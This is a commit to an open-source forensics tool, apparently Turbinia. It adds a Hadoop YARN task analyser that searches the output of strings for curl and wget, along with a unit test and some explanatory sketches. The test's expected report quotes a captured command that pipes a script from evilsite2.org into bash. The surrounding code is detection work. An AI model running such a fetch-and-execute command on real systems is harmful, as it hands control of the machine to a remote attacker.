
Hadoop (Yarn tasks) compromise analysis (#243)

* empty shell

* more scaffolding

* make all of this simpler

* Things appear to be working

* typo

* undo some filepath manipulations

* register the new hadoop Job

* cleanup

* renamed

* fix output evidence

* add tests

* typo

* styleguide

* full path to strings

* comments

* sync

* fix tests

* fix py3 tests

* fix py3 harder

* I call this 'bruteforce programming'

* Make _AnalyzeHadoopAppRoot return a list of strings, so the first one can be used as the status on the result Evidence (see the sketch after this list)

* remove extra tab

* also check at the beginning of the line
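That last design decision deserves a quick illustration: _AnalyzeHadoopAppRoot builds the report as a list of lines precisely so the first line can double as the short status on the result evidence. A minimal sketch of the pattern (the sample values here are made up, not from a real report):

# Sketch of the status convention described in the commit message above;
# the values are illustrative only.
report_lines = [
    'Found suspicious commands!',  # first line becomes the one-line status
    'File: /path/to/saved_task',
    'Command: "curl https://example.com/payload | bash"',
]
status = report_lines[0]
full_report = '\n'.join(report_lines)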
rgayon authored and aarontp committed Sep 19, 2018
1 parent d401f52 commit 6f031ea05f3bb9ab573c76c0107c5ca10830aa6b
Binary file not shown (the bad_yarn_saved_task test fixture referenced by the tests below).
@@ -24,13 +24,14 @@ def get_jobs():
     A list of TurbiniaJobs.
   """
   # Defer imports to prevent circular dependencies during init.
+  from turbinia.jobs.grep import GrepJob
+  from turbinia.jobs.hadoop import HadoopAnalysisJob
   from turbinia.jobs.plaso import PlasoJob
   from turbinia.jobs.psort import PsortJob
-  from turbinia.jobs.grep import GrepJob
-  from turbinia.jobs.worker_stat import StatJob
-  from turbinia.jobs.strings import StringsJob
   from turbinia.jobs.sshd import SSHDExtractionJob
   from turbinia.jobs.sshd import SSHDAnalysisJob
+  from turbinia.jobs.strings import StringsJob
+  from turbinia.jobs.worker_stat import StatJob
   from turbinia.jobs.tomcat import TomcatExtractionJob
   from turbinia.jobs.tomcat import TomcatAnalysisJob
   from turbinia.jobs.analysis.http_access_logs import HTTPAccessLogExtractionJob
@@ -39,10 +40,10 @@ def get_jobs():
   # TODO(aarontp): Dynamically look up job objects and make enabling/disabling
   # configurable through config and/or recipes.
   return [
-      StatJob(), PlasoJob(), PsortJob(), StringsJob(), GrepJob(),
-      SSHDExtractionJob(), SSHDAnalysisJob(), HTTPAccessLogExtractionJob(),
-      HTTPAccessLogAnalysisJob(), TomcatExtractionJob(), TomcatAnalysisJob(),
-      JenkinsAnalysisJob()]
+      GrepJob(), HadoopAnalysisJob(), HTTPAccessLogAnalysisJob(),
+      HTTPAccessLogExtractionJob(), JenkinsAnalysisJob(), PlasoJob(),
+      PsortJob(), SSHDExtractionJob(), SSHDAnalysisJob(), StatJob(),
+      StringsJob(), TomcatAnalysisJob(), TomcatExtractionJob()]
 
 
 class TurbiniaJob(object):
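For context on what registering HadoopAnalysisJob buys: the task manager instantiates every job returned by get_jobs() and compares evidence types against each job's evidence_input list. The dispatch code is not part of this diff, so treat the following as an illustrative sketch only:

# Illustration only: roughly how a registered job is matched to evidence.
# The real dispatch lives in Turbinia's task manager, not in this commit.
from turbinia.jobs import get_jobs

def jobs_for_evidence(evidence):
  """Returns jobs whose evidence_input accepts this evidence type."""
  return [
      job for job in get_jobs()
      if any(isinstance(evidence, input_type)
             for input_type in job.evidence_input)]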
@@ -0,0 +1,47 @@
# -*- coding: utf-8 -*-
# Copyright 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Job to execute Hadoop task."""
from __future__ import unicode_literals
from turbinia.evidence import GoogleCloudDisk
from turbinia.evidence import GoogleCloudDiskRawEmbedded
from turbinia.evidence import RawDisk
from turbinia.evidence import ReportText
from turbinia.jobs import TurbiniaJob
from turbinia.workers.hadoop import HadoopAnalysisTask
class HadoopAnalysisJob(TurbiniaJob):
"""Analyzes Hadoop AppRoot files."""
# The types of evidence that this Job will process
evidence_input = [GoogleCloudDisk, GoogleCloudDiskRawEmbedded, RawDisk]
evidence_output = [ReportText]
def __init__(self):
super(HadoopAnalysisJob, self).__init__(name='HadoopAnalysisJob')
def create_tasks(self, evidence):
"""Create task.
Args:
evidence: List of evidence object to process
Returns:
A list of tasks to schedule.
"""
tasks = [HadoopAnalysisTask() for _ in evidence]
return tasks
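A quick usage sketch of the one-task-per-evidence mapping above. The evidence constructors' exact arguments are not shown in this diff, so the bare RawDisk() calls are an assumption for illustration:

# Assumption: RawDisk() is constructible without arguments, for illustration.
job = HadoopAnalysisJob()
tasks = job.create_tasks([RawDisk(), RawDisk(), RawDisk()])
print(len(tasks))  # 3 -- one HadoopAnalysisTask per evidence object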
@@ -0,0 +1,121 @@
# -*- coding: utf-8 -*-
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Task to analyse Hadoop AppRoot files."""
from __future__ import unicode_literals
import codecs
import os
import subprocess
from turbinia import TurbiniaException
from turbinia.evidence import ReportText
from turbinia.lib.utils import extract_artifacts
from turbinia.workers import TurbiniaTask
class HadoopAnalysisTask(TurbiniaTask):
"""Task to analyse Hadoop AppRoot files."""
def _AnalyzeHadoopAppRoot(self, collected_artifacts):
"""Runs a naive AppRoot files parsing method.
This extracts strings from the saved task file, and searches for usual
post-compromise suspicious patterns.
TODO: properly parse the Proto. Some documentation can be found over there:
https://svn.apache.org/repos/asf/hadoop/common/branches/branch-0.23.7/hadoop-yarn-project/hadoop-yarn/hadoop-yarn-api/src/main/proto/yarn_protos.proto
Args:
collected_artifacts(list(str)): a list of paths to extracted files
Returns:
list(str): the result report, as a list of lines.
"""
report = []
strings_report = []
evil_commands = []
for filepath in collected_artifacts:
strings_report.append('Strings for {0:s}:'.format(filepath))
proc = subprocess.Popen(
'strings -a "{0:s}"'.format(filepath), shell=True,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
strings_output, _ = proc.communicate()
strings_output = codecs.decode(strings_output, 'utf-8')
strings_report.append(strings_output)
for line in strings_output.splitlines():
if (line.find('curl') >= 0) or (line.find('wget') >= 0):
evil_commands.append((filepath, line))
if evil_commands:
report.append('Found suspicious commands!')
else:
report.append('Did not find any suspicious commands.')
for filepath, command in evil_commands:
report.append('File: {0:s}'.format(filepath))
report.append('Command: "{0:s}"'.format(command))
report.append('')
report.append('All strings from Yarn Tasks:')
report.extend(strings_report)
return report
def run(self, evidence, result):
"""Run Hadoop specific analysis on the evidences.
Args:
evidence (Evidence object): The evidence we will process
result (TurbiniaTaskResult): The object to place task results into.
Returns:
TurbiniaTaskResult object.
"""
# What type of evidence we should output.
output_evidence = ReportText()
# Where to store the resulting output file.
output_file_name = 'hadoop_analysis.txt'
output_file_path = os.path.join(self.output_dir, output_file_name)
output_evidence.local_path = output_file_path
try:
# We don't use FileArtifactExtractionTask as it export one evidence per
# file extracted
collected_artifacts = extract_artifacts(
artifact_names=['HadoopAppRoot'],
disk_path=evidence.local_path,
output_dir=os.path.join(self.output_dir, 'artifacts')
)
text_report_lines = self._AnalyzeHadoopAppRoot(collected_artifacts)
if not text_report_lines:
raise TurbiniaException(
'Report generated by _AnalyzeHadoopAppRoot() is empty')
output_evidence.text_data = '\n'.join(text_report_lines)
# Write the report to the output file.
with open(output_file_path, 'w') as fh:
fh.write(output_evidence.text_data.encode('utf8'))
fh.write('\n'.encode('utf8'))
result.add_evidence(output_evidence, evidence.config)
result.close(self, success=True, status=text_report_lines[0])
except TurbiniaException as e:
result.close(self, success=False, status=str(e))
return result
return result
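The detection logic above boils down to running `strings` over each extracted file and grepping for download commands. A standalone sketch of the same triage step, usable outside Turbinia (assumes the binutils `strings` tool is on PATH; not part of the commit):

# Standalone sketch mirroring the task's naive detection.
import subprocess

def find_fetch_commands(path):
  """Returns lines of `strings` output that mention curl or wget."""
  output = subprocess.check_output(['strings', '-a', path])
  lines = output.decode('utf-8', errors='replace').splitlines()
  return [line for line in lines if 'curl' in line or 'wget' in line]

# e.g. find_fetch_commands('test_data/bad_yarn_saved_task')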
@@ -0,0 +1,63 @@
# -*- coding: utf-8 -*-
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for hadoop."""
from __future__ import unicode_literals
import os
import unittest
from turbinia import config
from turbinia.workers import hadoop
class HadoopAnalysisTest(unittest.TestCase):
"""Tests for HadoopAnalysisTask."""
_EXPECTED_REPORT = """Found suspicious commands!
File: /../../test_data/bad_yarn_saved_task
Command: "1533561022643*Bcurl https://evilsite2.org/aldnalezi/mygit/raw/master/ab.sh | bash0"
All strings from Yarn Tasks:
Strings for /../../test_data/bad_yarn_saved_task:
hadoop
default"
EHDTS
YARN_AM_RM_TOKEN
APPLICATION_WEB_PROXY_BASE
%/proxy/application_1526380001485_0125"
MAX_APP_ATTEMPTS
APP_SUBMIT_TIME_ENV
1533561022643*Bcurl https://evilsite2.org/aldnalezi/mygit/raw/master/ab.sh | bash0
YARNX
dr.who
,(\x092
Application application_1526380001485_0125 failed 2 times due to AM Container for appattempt_1526380001485_0125_000002 exited with exitCode: 0
Failing this attempt.Diagnostics: For more detailed output, check the application tracking page: http://apelcycluster-m:8088/cluster/app/application_1526380001485_0125 Then click on links to logs of each attempt.
. Failing the application.8
"""
def setUp(self):
self.filedir = os.path.dirname(os.path.realpath(__file__))
self.test_file = os.path.join(
self.filedir, '..', '..', 'test_data', 'bad_yarn_saved_task')
def testAnalyzeHadoopAppRoot(self):
"""Tests the _AnalyzeHadoopAppRoot method."""
config.LoadConfig()
task = hadoop.HadoopAnalysisTask()
self.maxDiff = None
report = '\n'.join(task._AnalyzeHadoopAppRoot([self.test_file]))
self.assertEqual(report.replace(self.filedir, ''), self._EXPECTED_REPORT)
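Note the `report.replace(self.filedir, '')` call: it strips the machine-specific absolute path so the expected report stays portable. To run just this test, something like the following works; the module path turbinia/workers/hadoop_test.py is an assumption, since the diff does not show the new test file's name:

# Assumed module location; adjust the import if the test file lives elsewhere.
import unittest

from turbinia.workers import hadoop_test

suite = unittest.TestLoader().loadTestsFromModule(hadoop_test)
unittest.TextTestRunner(verbosity=2).run(suite)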
